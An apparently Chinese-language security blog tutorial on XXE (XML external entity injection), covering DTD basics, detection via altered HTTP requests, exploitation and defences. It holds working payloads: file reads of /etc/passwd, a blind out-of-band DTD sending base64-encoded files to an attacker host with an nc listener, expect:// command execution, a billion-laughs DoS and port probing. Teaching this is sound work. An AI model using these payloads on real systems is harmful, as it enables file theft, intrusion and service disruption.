想不起来写点啥了,又是摸鱼的一天,看了一些红队大佬们整理的资料,非常精彩,于是一个咸鱼翻身先选了一些简单的小点来写一写个人的感想(后续会继续更新其他内容)
不能说写的是技术分享,因为师傅们的文章珠玉在前,也都不是什么新东西,就说说个人的理解,争取能清晰明了地表达出来想说的内容
今天从XXE开始,虽然XXE并不常见(个人感觉),但还是有一讲的必要
0x01 前言
XXE(XML External Entity Injection)全称为XML外部实体注入,这里强调的概念是“外部实体”与“XML”
要想完全说明这个漏洞,有必要先理清楚这两个概念
先说第一个概念:什么是XML?
这个。。。都知道,不需要我多说,指的是可扩展标记语言(EXtensible Markup Language),用来传输和存储数据,是一种允许用户对自己的标记语言进行定义的源语言
XML有自己的结构,包括:XML声明、DTD文档类型定义(可选)、文档元素
例如:
再说第二个概念:什么是外部实体?
说实体之前,要先说DTD
如上图所示,xml的格式规范由DTD(document type definition)控制
DTD可以像图片那样嵌入在XML中(内部声明,格式为 <!DOCTYPE 根元素 [元素声明]>)
例如:
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
也可以独立的放在另外一个单独的文件中(外部引用,格式为 <!DOCTYPE 根元素 SYSTEM "文件名">) (也可以结合使用如:<!DOCTYPE 根元素 SYSTEM "DTD文件路径" [定义内容]>)
例如:
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
而note.dtd的内容为:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
其中存在
PCDATA
PCDATA的意思是被解析的字符数据。PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理,而实体会被展开。
被解析的字符数据不应当包含任何&
,<
,或者>
字符,需要用&
<
>
实体来分别替换
CDATA
CDATA意思是字符数据,CDATA 是不会被解析器解析的文本,在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开
上面例子中的都是PCDATA的,而且都用了ELEMENT元素的声明
这里有很多人说得不清楚(关于DTD,可以参考详细的教程:https://www.w3cschool.cn/dtd/dtd-elements.html)
事实上,DTD可以有元素(ELEMENT)、有属性(ATTLIST)、有实体(ENTITY),这个实体就是我们着重要说的地方,另外两个就不展开了
这是一个DTD中的元素声明<!ELEMENT from (#PCDATA)>
这是一个DTD中的属性声明<!ATTLIST payment type CDATA "check">
这是一个DTD中的实体声明<!ENTITY king "Donald Trump">
实体是用于定义引用普通文本或特殊字符的快捷方式的变量,一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (;)
按照使用方式分类可以分为:内部(声明)实体与外部(引用)实体
内部实体(<!ENTITY 实体名称 "实体的值">)参考:
<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
<!ENTITY writer "Dawn">
]>
<test>&writer;</test>
外部实体(<!ENTITY 实体名称 SYSTEM "URI/URL">或<!ENTITY 实体名称 PUBLIC "public_ID" "URI">)参考:
<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<author>&file;</author>
(现在可以回答上前文的内容了,什么是外部实体?这就是外部实体)
外部实体支持的协议根据程序不同而不同(下图仅供参考。。。)
或者
根据实体有无参,分成通用实体与参数实体
通用实体
用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用
例如:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
<updateProfile>
<firstname>Joe</firstname>
<lastname>&file;</lastname>
...
</updateProfile>
参数实体
(1)使用 % 实体名
(这里面有一个空格不能缺) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;
引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用
<!ENTITY % an-element "<!ELEMENT mytag (subtag)>">
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
%an-element; %remote-dtd;
总结一下,就是
参数实体用% 实体名称声明,引用时也用%实体名称
其余实体直接用实体名称声明,引用时用&实体名称
参数实体只能在DTD中声明,在DTD中引用
其余实体只能在DTD中声明,可在xml中引用
至此,有关XXE漏洞的全部前言基础知识部分说完了
至于其他的,为了精简,就不在这次的讨论范围中了
0x02发现&原理
那么什么是XXE漏洞,或者说XXE漏洞的本质是什么?
正如前文所说,XXE(XML External Entity Injection)全称为XML外部实体注入
它发生在应用程序解析XML 输入时,没有禁止对外部实体的加载,导致加载了恶意的外部文件与代码,造成了任意文件读取、命令执行、内网端口探测、攻击内网等危害
本质和所有漏洞产生的本质一样,未对用户的恶意输入进行检测而直接带入并进行了操作
那XXE漏洞发生在哪呢?
因为是基于XML的漏洞,所以数据交互过程中是一定存在XML解析的
比如最简单的,抓包发现传的数据是XML格式的,且返回包能正常返回数据,说明服务端代码可以支持XML解析
我把这个XML格式的数据改成恶意的引用外部实体的数据,看返回包是不是也一块解析了?如果是,这就是一个经典的XXE
正常的数据包
POST /xxxxx HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: xxxxxxx Accept-Language: en-US,en;q=0.5 Referer: https://xxx.com/xxx.html Content-Type: application/xml Content-Length: xxx Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1 <?xml version="1.0"?> <catalog> <core id="123"> <author>lcx</author> <description>XML</description> </core> </catalog>
修改后的数据包
POST /xxxxx HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: xxxxxxx Accept-Language: en-US,en;q=0.5 Referer: https://xxx.com/xxx.html Content-Type: application/xml Content-Length: xxx Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1 <?xml version="1.0"?> <!DOCTYPE xxx [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <catalog> <core id="123"> <author>lcx</author> <description>&xxe;</description> </core> </catalog>
如果存在XXE,那么就会从返回包中看到/etc/passwd中的内容
上面举的例子中,Content-Type是application/xml
现在json格式可能多一些,Content-Type是application/json
那是不是可以考虑把Content-Type改成application/xml试试呢?万一呢
原来
POST /xxx HTTP/1.1 Host: xxxxx.com Accept: application/json Content-Type: application/json Content-Length: xxx {"search":"name","value":"123"}
尝试
POST /xxx HTTP/1.1 Host: xxxxx.com Accept: application/json Content-Type: application/xml Content-Length: xxx {"search":"name","value":"123"}
xxe攻击
POST /xxx HTTP/1.1 Host: xxxxx.com Accept: application/json Content-Type: application/xml Content-Length: xxx <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&xxe;</value> </root>
看返回包读取/etc/password
虽然可能性不大,但是可以试试
但是很多情况下,很不幸是没有回显的,我们无法通过返回包直接看到我们想看到的东西,比如看不到返回包里有/etc/passwd的结果
这就属于blind XXE了,这个问题留到下一小点利用的时候讨论
0x03利用
现在说说XXE究竟能干点啥,有多大能耐,有什么利用姿势?
1.文件读取
有回显的文件读取,上一小点已经说过,最基本的利用自不必说
可以解决一下上一小点结尾处的问题,没有回显或者回显报错怎么办?
答:可以采用OOB带外数据传输(话说与Blind相关的利用,万物皆可OOB,遇事不决OOB)
首先补充一个学到的小知识(详细参考文末参考链接)
如果想要读取的文件充满了符号,像这样乱七八糟的
正常读取可能会报错
学习大佬的经验,采用之前一直没提过的CDATA、参数实体来绕过
例如
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///d:/test.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
%dtd; ]>
<roottag>&all;</roottag>
evil.dtd中
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
说回 无回显读取
还是借助大佬的例子说明
payload
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd"> %remote;%int;%send; ]>
test.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:9999?p=%file;'>">
注意几个问题
(1)例子中连续调用三个实体%remote;%int;%send; ,是先通过%remote;调用test.dtd,再通过%int;调用test.dtd中的%file;,%file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send ,再调用 %send; 把读取到的数据发送到远程 vps 上,实现了带外数据的效果
(2)%为%的HTML实体编码,实体中不要有%
然后我在VPS上nc -lvvp 9999 监听,会收到base64编码后的敏感文件test.txt的内容信息
实际上blind XXE还有很多写法,上面的例子只是其中一种
比如还有这么用的
<?xml verstion="1.0" encoding="utf-8"?> <!DOCTYPE a[ <!ENTITY % f SYSTEM "http://ip/test.dtd"> %f; ]> <a>&b;</a> $data = simplexml_load_string($xml); print_r($data);
test.dtd
<!ENTITY b SYSTEM "file:///etc/passwd">
2.命令执行
在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<name>&xxe;</name>
</root>
实际上。。。额,只能说罕见
3.Dos
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
有名的billion laughs attack,用到了递归引用
4.内网端口探测
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]>
<root>
<name>&xxe;</name>
</root>
可以改变端口号来探测端口开放情况
常见的利用就说这些了
还有一些不常见的利用方式可以参考文末参考链接
0x04 防御
1.禁用外部实体方法
PHP
libxml_disable_entity_loader(true);
JAVA
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
2.黑名单过滤
<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC
参考文章:
https://xz.aliyun.com/t/3357
https://www.cnblogs.com/zhaijiahui/p/9147595.html
https://xz.aliyun.com/t/6887
https://www.cnblogs.com/r00tuser/p/7255939.html
未经允许,禁止转载